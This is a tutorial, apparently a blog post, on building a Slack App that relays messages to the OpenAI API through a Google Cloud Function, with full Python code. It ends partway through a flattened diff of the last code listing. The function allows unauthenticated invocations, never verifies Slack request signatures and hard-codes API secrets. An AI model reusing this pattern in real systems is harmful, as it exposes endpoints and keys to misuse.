Recently, I have been promoting the use of Generative AI within the team to improve work efficiency. Initially, we only aim to achieve an AI Assistant (ChatGPT functionality) to reduce the time spent on daily data queries, organizing cumbersome data, and manual data processing, thereby improving work efficiency. We hope that engineers, designers, PMs, marketers, etc., can all use it freely.
The simplest method is to directly purchase the ChatGPT Team plan, which costs US$25 per seat per month (billed annually). However, since we are not yet sure about everyone's usage frequency (volume) and hope to integrate with more collaboration and development processes in the future, we decided to use the OpenAI API and then integrate it with other services for team members to use.
The OpenAI API Key can be generated from this page. The Key does not correspond to a specific Model version; you need to specify the Model version you want to use and generate the corresponding Token cost when using it.
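As a quick sanity check that the Key works and that the model is chosen per request, here is a minimal sketch with the official openai Python package (the model name below is only an example):

# Minimal sketch: the key authenticates, and the model is specified on every request.
from openai import OpenAI

client = OpenAI(api_key="YOUR_OPENAI_API_KEY")  # key generated from the OpenAI key page

response = client.chat.completions.create(
    model="gpt-4-1106-preview",  # example model; token cost depends on the model you pick
    messages=[{"role": "user", "content": "Hello!"}],
)
print(response.choices[0].message.content)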
We need a service that can set the OpenAI API Key by ourselves and use that Key for ChatGPT-like usage.
Whether it’s a Chrome Extension or a Slack App, it’s hard to find a service that allows you to set the OpenAI API Key by yourself. Most services sell their own subscriptions, and allowing users to set their own API Key means they can’t make money and are purely doing charity.
After installation, go to Settings -> General -> Enter the OpenAI API Key.
You can call out the chat interface directly from the browser toolbar or side icon and use it directly:
If you only need translation, you can use this, which allows you to set the OpenAI API Key for translation.
Additionally, it is an open-source project and also provides macOS/Windows desktop programs:
Chrome Extension’s advantage is its speed, simplicity, and convenience—just install and use directly. The downside is that you need to provide the API Key to all members, making it difficult to control leakage issues. Additionally, using third-party services makes it hard to ensure data security.
A colleague from the R&D department recommended this OpenAI API chat wrapper, LibreChat: an open-source project that provides authentication, almost replicates the ChatGPT interface, and offers even more powerful features than ChatGPT.
You only need to clone the project, install Docker, set up the .env file, and start the Docker service; then you can use it directly through the web interface.
Tried it out, and it’s practically flawless, just like a local version of ChatGPT service. The only downside is that it requires server deployment. If there are no other considerations, you can directly use this open-source project.
Actually, setting up the LibreChat service on a server already achieves the desired effect. However, I had a sudden thought: wouldn’t it be more convenient if it could be integrated into daily tools? Additionally, the company’s server has strict permission settings, making it difficult to start services arbitrarily.
At the time, I didn’t think much about it and assumed there would be many OpenAI API integration services for Slack App. I thought I could just find one and set it up. Unexpectedly, it wasn’t that simple.
A Google search only turned up an official Slack x OpenAI press release from 2023/03, "Why we built the ChatGPT app for Slack," and some Beta images:
https://www.salesforce.com/news/stories/chatgpt-app-for-slack/
It looks very comprehensive and could greatly improve work efficiency. However, as of 2024/01, there has been no release news. The Beta registration link provided at the end of the article is also invalid, with no further updates. (Is Microsoft trying to support Teams first?)
[2024/02/14 Update]:
Due to the lack of an official app, I turned to search for third-party developer apps. I searched and tried several but hit a wall. There were not many suitable apps, and none provided a custom Key feature. Each one was designed to sell services and make money.
Since I previously had some experience developing Slack Apps, I decided to build it myself.
⚠️Disclaimer⚠️
This article demonstrates how to create a Slack App and quickly use Google Cloud Functions to meet the requirements by integrating the OpenAI API. There are many applications for Slack Apps, feel free to explore.
⚠️⚠️ The advantage of Google Cloud Functions, Function as a Service (FaaS), is that it is convenient and fast, with a free quota. Once the program is written, it can be deployed and executed directly, and it scales automatically. The downside is that the service environment is controlled by GCP. If the service is not called for a long time, it will go into hibernation, and calling it again will enter Cold Start, requiring a longer response time. Additionally, it is more challenging to have multiple services interact with each other.
For more complete or high-demand usage, it is recommended to set up a VM (App Engine) to run the service.
The complete Cloud Functions Python code and Slack App settings are attached at the end of the article. Those who are too lazy to follow step by step can quickly refer to it.
Go to Slack App:
Click “Create New App”
Select “From scratch”
Enter “App Name” and choose the Workspace to join.
After creation, go to “OAuth & Permissions” to add the permissions needed for the Bot.
Scroll down to find the “Scopes” section, click “Add an OAuth Scope” and add the following permissions:
After adding Bot permissions, click “Install App” on the left -> “Install to Workspace”
If the Slack App adds other permissions later, you need to click “Reinstall” again for them to take effect.
But rest assured, the Bot Token will not change due to reinstallation.
After setting up the Slack Bot Token permissions, go to “App Home”:
Scroll down to find the “Show Tabs” section, enable “Messages Tab” and “Allow users to send Slash commands and messages from the messages tab” (if this is not checked, you cannot send messages, and it will display “Sending messages to this app has been turned off.”).
Return to the Slack Workspace, press “Command+R” to refresh the screen, and you will see the newly created Slack App and message input box:
At this point, sending a message to the App has no functionality.
Next, we need to enable the event subscription feature of the Slack App, which will call the API to the specified URL when a specified event occurs.
For the Request URL part, Google Cloud Functions will come into play.
After setting up the project and billing information, click “Create Function”.
Enter the project name as the Function name, and select "Allow unauthenticated invocations" for Authentication, which means anyone who knows the URL can access it.
If you cannot create a Function or change Authentication, it means your GCP account does not have full Google Cloud Functions permissions. You need to ask the organization administrator to add the Cloud Functions Admin permission in addition to your original role to use it.
Runtime: Python 3.8 or higher
main.py:
import functions_framework

@functions_framework.http
def hello_http(request):
    request_json = request.get_json(silent=True)
    request_args = request.args
    request_headers = request.headers

    # You can simply use print to record runtime logs, which can be viewed in Logs
    # For advanced Logging Level usage, refer to: https://cloud.google.com/logging/docs/reference/libraries
    print(request_json)

    # Due to the FAAS (Cloud Functions) limitation, if the service is not called for a long time, it will enter a cold start when called again, which may not respond within the 3-second limit set by Slack
    # Additionally, the OpenAI API request takes a certain amount of time to respond (depending on the response length, it may take nearly 1 minute to complete)
    # If Slack does not receive a response within the time limit, it will consider the request lost and will call again
    # This can cause duplicate requests and responses, so we can set X-Slack-No-Retry: 1 in the Response Headers to inform Slack not to retry even if it does not receive a response within the time limit
    headers = {'X-Slack-No-Retry': 1}

    # If it is a Slack Retry request...ignore it
    if request_headers and 'X-Slack-Retry-Num' in request_headers:
        return ('OK!', 200, headers)

    # Slack App Event Subscriptions Verify
    # https://api.slack.com/events/url_verification
    if request_json and 'type' in request_json and request_json['type'] == 'url_verification':
        challenge = ""
        if 'challenge' in request_json:
            challenge = request_json['challenge']
        return (challenge, 200, headers)

    return ("Access Denied!", 400, headers)
Enter the following dependencies in requirements.txt:
functions-framework==3.*
requests==2.31.0
openai==1.9.0
Currently, there is no functionality, it just allows the Slack App to pass the Event Subscriptions verification. You can directly click “Deploy” to complete the first deployment.
⚠️If you are not familiar with the Cloud Functions editor, you can scroll down to the bottom of the article to see the supplementary content.
After the deployment is complete (green checkmark), copy the Cloud Functions URL:
Paste the Request URL back into the Slack App Enable Events.
If everything is correct, “Verified” will appear, completing the verification.
What happens here is that when a verification request is received from Slack:
{
    "token": "Jhj5dZrVaK7ZwHHjRyZWjbDl",
    "challenge": "3eZbrw1aBm2rZgRNFdxV2595E9CY3gmdALWMmHkvFXO7tYXAYM8P",
    "type": "url_verification"
}
Respond with the content of the challenge field to pass the verification.
After enabling successfully, scroll down to find the “Subscribe to bot events” section, click “Add Bot User Event” to add the “message.im” permission.
After adding the full permissions, click the “reinstall your app” link at the top to reinstall the Slack App to the Workspace, and the Slack App setup is complete.
You can also go to “App Home” or “Basic Information” to customize the Slack App’s name and avatar.
Basic Information
First, we need to obtain the essential OPENAI API KEY and Bot User OAuth Token:
- OPENAI API KEY: from the OpenAI API key page.
- Bot User OAuth Token: from OAuth Tokens for Your Workspace.

When a user sends a message to the Slack App, the following Event JSON Payload is received:
{
    "token": "XXX",
    "team_id": "XXX",
    "context_team_id": "XXX",
    "context_enterprise_id": null,
    "api_app_id": "XXX",
    "event": {
        "client_msg_id": "XXX",
        "type": "message",
        "text": "你好",
        "user": "XXX",
        "ts": "1707920753.115429",
        "blocks": [
            {
                "type": "rich_text",
                "block_id": "orfng",
                "elements": [
                    {
                        "type": "rich_text_section",
                        "elements": [
                            {
                                "type": "text",
                                "text": "你好"
                            }
                        ]
                    }
                ]
            }
        ],
        "team": "XXX",
        "channel": "XXX",
        "event_ts": "1707920753.115429",
        "channel_type": "im"
    },
    "type": "event_callback",
    "event_id": "XXX",
    "event_time": 1707920753,
    "authorizations": [
        {
            "enterprise_id": null,
            "team_id": "XXX",
            "user_id": "XXX",
            "is_bot": true,
            "is_enterprise_install": false
        }
    ],
    "is_ext_shared_channel": false,
    "event_context": "4-XXX"
}
Based on the above Json Payload, we can complete the integration from Slack messages to the OpenAI API and then back to replying to Slack messages:
Cloud Functions main.py:
import functions_framework
import requests
import asyncio
import json
import time
from openai import AsyncOpenAI

OPENAI_API_KEY = "OPENAI API KEY"
SLACK_BOT_TOKEN = "Bot User OAuth Token"

# The OPENAI API Model used
# https://platform.openai.com/docs/models
OPENAI_MODEL = "gpt-4-1106-preview"

@functions_framework.http
def hello_http(request):
    request_json = request.get_json(silent=True)
    request_args = request.args
    request_headers = request.headers

    # You can simply use print to record runtime logs, which can be viewed in Logs
    # For advanced Logging Level usage, refer to: https://cloud.google.com/logging/docs/reference/libraries
    print(request_json)

    # Due to the nature of FAAS (Cloud Functions), if the service is not called for a long time, it will enter a cold start when called again, which may not respond within the 3-second limit set by Slack
    # Additionally, the OpenAI API request to response takes a certain amount of time (depending on the response length, it may take close to 1 minute to complete)
    # If Slack does not receive a response within the time limit, it will consider the request lost and will call again
    # This can cause duplicate requests and responses, so we can set X-Slack-No-Retry: 1 in the Response Headers to inform Slack not to retry even if it does not receive a response within the time limit
    headers = {'X-Slack-No-Retry': 1}

    # If it is a Slack Retry request...ignore it
    if request_headers and 'X-Slack-Retry-Num' in request_headers:
        return ('OK!', 200, headers)

    # Slack App Event Subscriptions Verify
    # https://api.slack.com/events/url_verification
    if request_json and 'type' in request_json and request_json['type'] == 'url_verification':
        challenge = ""
        if 'challenge' in request_json:
            challenge = request_json['challenge']
        return (challenge, 200, headers)

    # Handle Event Subscriptions Events...
    if request_json and 'event' in request_json and 'type' in request_json['event']:
        # If the event source is the App and the App ID == Slack App ID, it means the event was triggered by the Slack App itself
        # Ignore and do not process, otherwise it will fall into an infinite loop Slack App -> Cloud Functions -> Slack App -> Cloud Functions...
        if 'api_app_id' in request_json and 'app_id' in request_json['event'] and request_json['api_app_id'] == request_json['event']['app_id']:
            return ('OK!', 200, headers)

        # Event name, for example: message (related to messages), app_mention (mentioned)....
        eventType = request_json['event']['type']

        # SubType, for example: message_changed (edited message), message_deleted (deleted message)...
        # New messages do not have a Sub Type
        eventSubType = None
        if 'subtype' in request_json['event']:
            eventSubType = request_json['event']['subtype']

        if eventType == 'message':
            # Messages with Sub Type are edited, deleted, replied to...
            # Ignore and do not process
            if eventSubType is not None:
                return ("OK!", 200, headers)

            # Sender of the event message
            eventUser = request_json['event']['user']
            # Channel of the event message
            eventChannel = request_json['event']['channel']
            # Content of the event message
            eventText = request_json['event']['text']
            # TS (message ID) of the event message
            eventTS = request_json['event']['event_ts']

            # TS (message ID) of the parent message in the thread of the event message
            # Only new messages in the thread will have this data
            eventThreadTS = None
            if 'thread_ts' in request_json['event']:
                eventThreadTS = request_json['event']['thread_ts']

            openAIRequest(eventChannel, eventTS, eventThreadTS, eventText)
            return ("OK!", 200, headers)

    return ("Access Denied!", 400, headers)

def openAIRequest(eventChannel, eventTS, eventThreadTS, eventText):

    # Set Custom instructions
    # Thanks to my colleague (https://twitter.com/je_suis_marku) for the support
    messages = [
        {"role": "system", "content": "I can only understand Traditional Chinese from Taiwan and English"},
        {"role": "system", "content": "I cannot understand Simplified Chinese"},
        {"role": "system", "content": "If I speak Chinese, I will respond in Traditional Chinese from Taiwan, and it must conform to common Taiwanese usage."},
        {"role": "system", "content": "If I speak English, I will respond in English."},
        {"role": "system", "content": "Do not respond with pleasantries."},
        {"role": "system", "content": "There should be a space between Chinese and English. There should be a space between Chinese characters and any other language characters, including numbers and emojis."},
        {"role": "system", "content": "If you don't know the answer, or if your knowledge is outdated, please search online before answering."},
        {"role": "system", "content": "I will tip you 200 USD, if you answer well."}
    ]

    messages.append({
        "role": "user", "content": eventText
    })

    replyMessageTS = slackRequestPostMessage(eventChannel, eventTS, "Generating response...")
    asyncio.run(openAIRequestAsync(eventChannel, replyMessageTS, messages))

async def openAIRequestAsync(eventChannel, eventTS, messages):
    client = AsyncOpenAI(
        api_key=OPENAI_API_KEY,
    )

    # Stream Response
    stream = await client.chat.completions.create(
        model=OPENAI_MODEL,
        messages=messages,
        stream=True,
    )

    result = ""

    try:
        debounceSlackUpdateTime = None
        async for chunk in stream:
            result += chunk.choices[0].delta.content or ""

            # Update the message every 0.8 seconds to avoid frequent calls to the Slack Update Message API, which may fail or waste Cloud Functions request counts
            if debounceSlackUpdateTime is None or time.time() - debounceSlackUpdateTime >= 0.8:
                response = slackUpdateMessage(eventChannel, eventTS, None, result + "...")
                debounceSlackUpdateTime = time.time()
    except Exception as e:
        print(e)
        result += "...*[Error occurred]*"

    slackUpdateMessage(eventChannel, eventTS, None, result)


### Slack ###
def slackUpdateMessage(channel, ts, metadata, text):
    endpoint = "/chat.update"
    payload = {
        "channel": channel,
        "ts": ts
    }
    if metadata is not None:
        payload['metadata'] = metadata

    payload['text'] = text

    response = slackRequest(endpoint, "POST", payload)
    return response

def slackRequestPostMessage(channel, target_ts, text):
    endpoint = "/chat.postMessage"
    payload = {
        "channel": channel,
        "text": text,
    }
    if target_ts is not None:
        payload['thread_ts'] = target_ts

    response = slackRequest(endpoint, "POST", payload)

    if response is not None and 'ts' in response:
        return response['ts']
    return None

def slackRequest(endpoint, method, payload):
    url = "https://slack.com/api" + endpoint

    headers = {
        "Authorization": f"Bearer {SLACK_BOT_TOKEN}",
        "Content-Type": "application/json",
    }

    response = None
    if method == "POST":
        response = requests.post(url, headers=headers, data=json.dumps(payload))
    elif method == "GET":
        response = requests.post(url, headers=headers)

    if response and response.status_code == 200:
        result = response.json()
        return result
    else:
        return None
Back to Slack to test:
Now you can perform Q&A similar to ChatGPT and OpenAI API.
There are many ways to implement the interruption. For example, a new message sent in the same thread before the previous response is complete could interrupt that response, or you could click a message and trigger an interruption shortcut.
This article uses the example of adding a “Message Interruption” shortcut.
Regardless of the interruption method, the core principle is the same. Since we do not have a database to store generated messages and message status information, the implementation relies on the metadata field of Slack messages (which can store custom information within specified messages).
When the chat.update API endpoint is called successfully, it returns the current text content and metadata of the message. Therefore, in the OpenAI API Stream -> Slack Update Message code above, we add a check: if the metadata in the update response carries an "aborted" mark, we interrupt the OpenAI stream response.
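In isolation, that check can be expressed as a small helper like this (a simplified sketch of the idea; the complete version is embedded in the full main.py further below):

# Simplified sketch: inspect a chat.update response and decide whether the user has
# marked the message as aborted via the Shortcut.
def is_aborted(update_response: dict) -> bool:
    if not update_response or not update_response.get('ok'):
        return False
    metadata = update_response.get('message', {}).get('metadata', {})
    return metadata.get('event_type') == "aborted"

The streaming loop can call it after every slackUpdateMessage call and break out of the OpenAI stream when it returns True.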
First, you need to add a Slack App message shortcut
Go to the Slack App management interface, find the “Interactivity & Shortcuts” section, click to enable it, and use the same Cloud Functions URL.
Click “Create New Shortcut” to add a new message shortcut.
Select “On messages”.
- Name: Stop OpenAI API Response
- Short Description: Stop OpenAI API Response
- Callback ID: abort_openai_api (for program identification, can be customized)

Click "Create" to complete the creation, and finally remember to click "Save Changes" at the bottom right to save the settings.
Click “reinstall your app” at the top again to take effect.
Back in Slack, click the “…” at the top right of the message, and the “Stop OpenAI API Response” shortcut will appear (clicking it at this time has no effect).
When the user presses the Shortcut on the message, an Event Json Payload will be sent:
{
    "type": "message_action",
    "token": "XXXXXX",
    "action_ts": "1706188005.387646",
    "team": {
        "id": "XXXXXX",
        "domain": "XXXXXX-XXXXXX"
    },
    "user": {
        "id": "XXXXXX",
        "username": "zhgchgli",
        "team_id": "XXXXXX",
        "name": "zhgchgli"
    },
    "channel": {
        "id": "XXXXXX",
        "name": "directmessage"
    },
    "is_enterprise_install": false,
    "enterprise": null,
    "callback_id": "abort_openai_api",
    "trigger_id": "XXXXXX",
    "response_url": "https://hooks.slack.com/app/XXXXXX/XXXXXX/XXXXXX",
    "message_ts": "1706178957.161109",
    "message": {
        "bot_id": "XXXXXX",
        "type": "message",
        "text": "The English translation of 高麗菜包 is \"cabbage wrap.\" If you are using it as a dish name, it may sometimes be named specifically according to the contents of the dish, such as \"pork cabbage wrap\" or \"vegetable cabbage wrap.\"",
        "user": "XXXXXX",
        "ts": "1706178957.161109",
        "app_id": "XXXXXX",
        "blocks": [
            {
                "type": "rich_text",
                "block_id": "eKgaG",
                "elements": [
                    {
                        "type": "rich_text_section",
                        "elements": [
                            {
                                "type": "text",
                                "text": "The English translation of 高麗菜包 is \"cabbage wrap.\" If you are using it as a dish name, it may sometimes be named specifically according to the contents of the dish, such as \"pork cabbage wrap\" or \"vegetable cabbage wrap.\""
                            }
                        ]
                    }
                ]
            }
        ],
        "team": "XXXXXX",
        "bot_profile": {
            "id": "XXXXXX",
            "deleted": false,
            "name": "Rick C-137",
            "updated": 1706001605,
            "app_id": "XXXXXX",
            "icons": {
                "image_36": "https://avatars.slack-edge.com/2024-01-23/6517244582244_0c708dfa3f893c72d4c2_36.png",
                "image_48": "https://avatars.slack-edge.com/2024-01-23/6517244582244_0c708dfa3f893c72d4c2_48.png",
                "image_72": "https://avatars.slack-edge.com/2024-01-23/6517244582244_0c708dfa3f893c72d4c2_72.png"
            },
            "team_id": "XXXXXX"
        },
        "edited": {
            "user": "XXXXXX",
            "ts": "1706187989.000000"
        },
        "thread_ts": "1706178832.102439",
        "parent_user_id": "XXXXXX"
    }
}
Complete Cloud Functions main.py:
import functions_framework
import requests
import asyncio
import json
import time
from openai import AsyncOpenAI

OPENAI_API_KEY = "OPENAI API KEY"
SLACK_BOT_TOKEN = "Bot User OAuth Token"

# The OPENAI API Model used
# https://platform.openai.com/docs/models
OPENAI_MODEL = "gpt-4-1106-preview"

@functions_framework.http
def hello_http(request):
    request_json = request.get_json(silent=True)
    request_args = request.args
    request_headers = request.headers

    # Shortcut Event will be given from post payload field
    # https://api.slack.com/reference/interaction-payloads/shortcuts
    payload = request.form.get('payload')
    if payload is not None:
        payload = json.loads(payload)

    # You can simply use print to record runtime logs, which can be viewed in Logs
    # For advanced Logging Level usage, refer to: https://cloud.google.com/logging/docs/reference/libraries
    print(payload)

    # Due to the nature of FAAS (Cloud Functions), if the service is not called for a long time, it will enter a cold start when called again, which may not respond within the 3-second limit set by Slack
    # Additionally, the OpenAI API request takes a certain amount of time to respond (depending on the response length, it may take nearly 1 minute to complete)
    # If Slack does not receive a response within the time limit, it will consider the request lost and will call again
    # This will cause repeated requests and responses, so we can set X-Slack-No-Retry: 1 in the Response Headers to inform Slack not to retry even if it does not receive a response within the time limit
    headers = {'X-Slack-No-Retry': 1}

    # If it is a Slack Retry request...ignore it
    if request_headers and 'X-Slack-Retry-Num' in request_headers:
        return ('OK!', 200, headers)

    # Slack App Event Subscriptions Verify
    # https://api.slack.com/events/url_verification
    if request_json and 'type' in request_json and request_json['type'] == 'url_verification':
        challenge = ""
        if 'challenge' in request_json:
            challenge = request_json['challenge']
        return (challenge, 200, headers)

    # Handle Event Subscriptions Events...
    if request_json and 'event' in request_json and 'type' in request_json['event']:
        # If the Event source is the App and App ID == Slack App ID, it means the event was triggered by the Slack App itself
        # Ignore and do not process, otherwise it will fall into an infinite loop Slack App -> Cloud Functions -> Slack App -> Cloud Functions...
        if 'api_app_id' in request_json and 'app_id' in request_json['event'] and request_json['api_app_id'] == request_json['event']['app_id']:
            return ('OK!', 200, headers)

        # Event name, for example: message (related to messages), app_mention (mentioned)...
        eventType = request_json['event']['type']

        # SubType, for example: message_changed (edited message), message_deleted (deleted message)...
        # New messages do not have Sub Type
        eventSubType = None
        if 'subtype' in request_json['event']:
            eventSubType = request_json['event']['subtype']

        if eventType == 'message':
            # Messages with Sub Type are edited, deleted, replied to...
            # Ignore and do not process
            if eventSubType is not None:
                return ("OK!", 200, headers)

            # Message sender of the Event
            eventUser = request_json['event']['user']
            # Channel of the Event message
            eventChannel = request_json['event']['channel']
            # Content of the Event message
            eventText = request_json['event']['text']
            # TS (message ID) of the Event message
            eventTS = request_json['event']['event_ts']

            # TS (message ID) of the parent message in the thread of the Event message
            # Only new messages in the thread will have this data
            eventThreadTS = None
            if 'thread_ts' in request_json['event']:
                eventThreadTS = request_json['event']['thread_ts']

            openAIRequest(eventChannel, eventTS, eventThreadTS, eventText)
            return ("OK!", 200, headers)

    # Handle Shortcut
    if payload and 'type' in payload:
        payloadType = payload['type']

        # If it is a message Shortcut
        if payloadType == 'message_action':
            print(payloadType)
            callbackID = None
            channel = None
            ts = None
            text = None
            triggerID = None

            if 'callback_id' in payload:
                callbackID = payload['callback_id']
            if 'channel' in payload:
                channel = payload['channel']['id']
            if 'message' in payload:
                ts = payload['message']['ts']
                text = payload['message']['text']
            if 'trigger_id' in payload:
                triggerID = payload['trigger_id']

            if channel is not None and ts is not None and text is not None:
                # If it is the Stop OpenAI API Response Generation Shortcut
                if callbackID == "abort_openai_api":
                    slackUpdateMessage(channel, ts, {"event_type": "aborted", "event_payload": {}}, text)
                    if triggerID is not None:
                        slackOpenModal(triggerID, callbackID, "Successfully stopped OpenAI API response generation!")
                    return ("OK!", 200, headers)

        return ("OK!", 200, headers)

    return ("Access Denied!", 400, headers)

def openAIRequest(eventChannel, eventTS, eventThreadTS, eventText):

    # Set Custom instructions
    # Thanks to colleague (https://twitter.com/je_suis_marku) for support
    messages = [
        {"role": "system", "content": "I can only understand Traditional Chinese from Taiwan and English"},
        {"role": "system", "content": "I cannot understand Simplified Chinese"},
        {"role": "system", "content": "If I speak Chinese, I will respond in Traditional Chinese from Taiwan, and it must conform to common Taiwanese usage."},
        {"role": "system", "content": "If I speak English, I will respond in English."},
        {"role": "system", "content": "Do not respond with pleasantries."},
        {"role": "system", "content": "There should be a space between Chinese and English. There should be a space between Chinese characters and any other language characters, including numbers and emojis."},
        {"role": "system", "content": "If you don't know the answer, or your knowledge is outdated, please search online before answering."},
        {"role": "system", "content": "I will tip you 200 USD, if you answer well."}
    ]

    messages.append({
        "role": "user", "content": eventText
    })

    replyMessageTS = slackRequestPostMessage(eventChannel, eventTS, "Generating response...")
    asyncio.run(openAIRequestAsync(eventChannel, replyMessageTS, messages))

async def openAIRequestAsync(eventChannel, eventTS, messages):
    client = AsyncOpenAI(
        api_key=OPENAI_API_KEY,
    )

    # Stream Response
    stream = await client.chat.completions.create(
        model=OPENAI_MODEL,
        messages=messages,
        stream=True,
    )

    result = ""

    try:
        debounceSlackUpdateTime = None
        async for chunk in stream:
            result += chunk.choices[0].delta.content or ""

            # Update the message every 0.8 seconds to avoid frequent calls to the Slack Update Message API, which may fail or waste Cloud Functions request counts
            if debounceSlackUpdateTime is None or time.time() - debounceSlackUpdateTime >= 0.8:
                response = slackUpdateMessage(eventChannel, eventTS, None, result + "...")
                debounceSlackUpdateTime = time.time()

                # If the message has metadata & metadata event_type == aborted, it means the response has been marked as terminated by the user
                if response and 'ok' in response and response['ok'] == True and 'message' in response and 'metadata' in response['message'] and 'event_type' in response['message']['metadata'] and response['message']['metadata']['event_type'] == "aborted":
                    result += "...*[Terminated]*"
                    break
                # The message has been deleted
                elif response and 'ok' in response and response['ok'] == False and 'error' in response and response['error'] == "message_not_found":
                    break

        await stream.close()

    except Exception as e:
        print(e)
        result += "...*[Error occurred]*"

    slackUpdateMessage(eventChannel, eventTS, None, result)


### Slack ###
def slackOpenModal(trigger_id, callback_id, text):
    slackRequest("/views.open", "POST", {
        "trigger_id": trigger_id,
        "view": {
            "type": "modal",
            "callback_id": callback_id,
            "title": {
                "type": "plain_text",
                "text": "Prompt"
            },
            "blocks": [
                {
                    "type": "section",
                    "text": {
                        "type": "mrkdwn",
                        "text": text
                    }
                }
            ]
        }
    })

def slackUpdateMessage(channel, ts, metadata, text):
    endpoint = "/chat.update"
    payload = {
        "channel": channel,
        "ts": ts
    }
    if metadata is not None:
        payload['metadata'] = metadata

    payload['text'] = text

    response = slackRequest(endpoint, "POST", payload)
    return response

def slackRequestPostMessage(channel, target_ts, text):
    endpoint = "/chat.postMessage"
    payload = {
        "channel": channel,
        "text": text,
    }
    if target_ts is not None:
        payload['thread_ts'] = target_ts

    response = slackRequest(endpoint, "POST", payload)

    if response is not None and 'ts' in response:
        return response['ts']
    return None

def slackRequest(endpoint, method, payload):
    url = "https://slack.com/api" + endpoint

    headers = {
        "Authorization": f"Bearer {SLACK_BOT_TOKEN}",
        "Content-Type": "application/json",
    }

    response = None
    if method == "POST":
        response = requests.post(url, headers=headers, data=json.dumps(payload))
    elif method == "GET":
        response = requests.post(url, headers=headers)

    if response and response.status_code == 200:
        result = response.json()
        return result
    else:
        return None
Back to Slack to test:
Success! When we trigger the Stop OpenAI API Response Shortcut, the ongoing response is terminated and the message ends with [Terminated].
Similarly, you can also create a Shortcut to delete messages, implementing the deletion of messages sent by the Slack App.
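A hedged sketch of that delete idea, reusing the article's slackRequest helper (the delete_message callback ID is an assumption; /chat.delete is the corresponding Slack Web API method and uses the same bot token):

# Hypothetical sketch: handle a second message Shortcut (callback_id "delete_message")
# that deletes the Slack App's own reply via chat.delete.
def handle_delete_shortcut(payload, headers):
    if payload.get('callback_id') != "delete_message":
        return None
    channel = payload.get('channel', {}).get('id')
    ts = payload.get('message', {}).get('ts')
    if channel and ts:
        slackRequest("/chat.delete", "POST", {"channel": channel, "ts": ts})
    return ("OK!", 200, headers)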
If you send a new message in the same thread, it can be considered a follow-up question to the same issue. At this point, you can add a feature to supplement the new prompt with the previous conversation content.
Add slackGetReplies & fill the thread content into the OpenAI API prompt:
Complete Cloud Functions main.py:
import functions_framework
+import requests
+import asyncio
+import json
+import time
+from openai import AsyncOpenAI
+
+OPENAI_API_KEY = "OPENAI API KEY"
+SLACK_BOT_TOKEN = "Bot User OAuth Token"
+
+# The OPENAI API Model used
+# https://platform.openai.com/docs/models
+OPENAI_MODEL = "gpt-4-1106-preview"
+
+@functions_framework.http
+def hello_http(request):
+ request_json = request.get_json(silent=True)
+ request_args = request.args
+ request_headers = request.headers
+
+ # Event from Shortcut will be given in post payload field
+ # https://api.slack.com/reference/interaction-payloads/shortcuts
+ payload = request.form.get('payload')
+ if payload is not None:
+ payload = json.loads(payload)
+
+ # You can simply use print to record runtime logs, which can be viewed in Logs
+ # For advanced Logging Level usage, refer to: https://cloud.google.com/logging/docs/reference/libraries
+ print(payload)
+
+ # Due to the nature of FAAS (Cloud Functions), if the service is not called for a long time, it will enter a cold start when called again, which may not respond within Slack's 3-second limit
+ # Plus, OpenAI API requests take a certain amount of time to respond (depending on the response length, it may take up to 1 minute to complete)
+ # If Slack does not receive a response within the time limit, it will consider the request lost and will call again
+ # This can cause duplicate requests and responses, so we can set X-Slack-No-Retry: 1 in the Response Headers to inform Slack not to retry even if it does not receive a response within the time limit
+ headers = {'X-Slack-No-Retry':1}
+
+ # If it's a Slack Retry request...ignore it
+ if request_headers and 'X-Slack-Retry-Num' in request_headers:
+ return ('OK!', 200, headers)
+
+ # Slack App Event Subscriptions Verify
+ # https://api.slack.com/events/url_verification
+ if request_json and 'type' in request_json and request_json['type'] == 'url_verification':
+ challenge = ""
+ if 'challenge' in request_json:
+ challenge = request_json['challenge']
+ return (challenge, 200, headers)
+
+ # Handle Event Subscriptions Events...
+ if request_json and 'event' in request_json and 'type' in request_json['event']:
+ apiAppID = None
+ if 'api_app_id' in request_json:
+ apiAppID = request_json['api_app_id']
+ # If the event source is the App and App ID == Slack App ID, it means the event was triggered by the Slack App itself
+ # Ignore it to avoid infinite loops Slack App -> Cloud Functions -> Slack App -> Cloud Functions...
+ if 'app_id' in request_json['event'] and apiAppID == request_json['event']['app_id']:
+ return ('OK!', 200, headers)
+
+ # Event name, e.g., message (related to messages), app_mention (mentioned)....
+ eventType = request_json['event']['type']
+
+ # SubType, e.g., message_changed (edited message), message_deleted (deleted message)...
+ # New messages do not have a Sub Type
+ eventSubType = None
+ if 'subtype' in request_json['event']:
+ eventSubType = request_json['event']['subtype']
+
+ if eventType == 'message':
+ # Messages with Sub Type are edited, deleted, or replied to...
+ # Ignore them
+ if eventSubType is not None:
+ return ("OK!", 200, headers)
+
+ # Message sender of the Event
+ eventUser = request_json['event']['user']
+ # Channel of the Event message
+ eventChannel = request_json['event']['channel']
+ # Content of the Event message
+ eventText = request_json['event']['text']
+ # TS (message ID) of the Event message
+ eventTS = request_json['event']['event_ts']
+
+ # TS (message ID) of the parent message in the thread of the Event message
+ # Only new messages in the thread will have this data
+ eventThreadTS = None
+ if 'thread_ts' in request_json['event']:
+ eventThreadTS = request_json['event']['thread_ts']
+
+ openAIRequest(apiAppID, eventChannel, eventTS, eventThreadTS, eventText)
+ return ("OK!", 200, headers)
+
+
+ # Handle Shortcut (message)
+ if payload and 'type' in payload:
+ payloadType = payload['type']
+
+ # If it's a message Shortcut
+ if payloadType == 'message_action':
+ callbackID = None
+ channel = None
+ ts = None
+ text = None
+ triggerID = None
+
+ if 'callback_id' in payload:
+ callbackID = payload['callback_id']
+ if 'channel' in payload:
+ channel = payload['channel']['id']
+ if 'message' in payload:
+ ts = payload['message']['ts']
+ text = payload['message']['text']
+ if 'trigger_id' in payload:
+ triggerID = payload['trigger_id']
+
+ if channel is not None and ts is not None and text is not None:
+ # If it's the Stop OpenAI API response Shortcut
+ if callbackID == "abort_openai_api":
+ slackUpdateMessage(channel, ts, {"event_type": "aborted", "event_payload": { }}, text)
+ if triggerID is not None:
+ slackOpenModal(triggerID, callbackID, "Successfully stopped OpenAI API response!")
+ return ("OK!", 200, headers)
+
+
+ return ("Access Denied!", 400, headers)
+
+def openAIRequest(apiAppID, eventChannel, eventTS, eventThreadTS, eventText):
+
+ # Set Custom instructions
+ # Thanks to my colleague (https://twitter.com/je_suis_marku) for the support
+ messages = [
+ {"role": "system", "content": "I can only understand Traditional Chinese and English"},
+ {"role": "system", "content": "I cannot understand Simplified Chinese"},
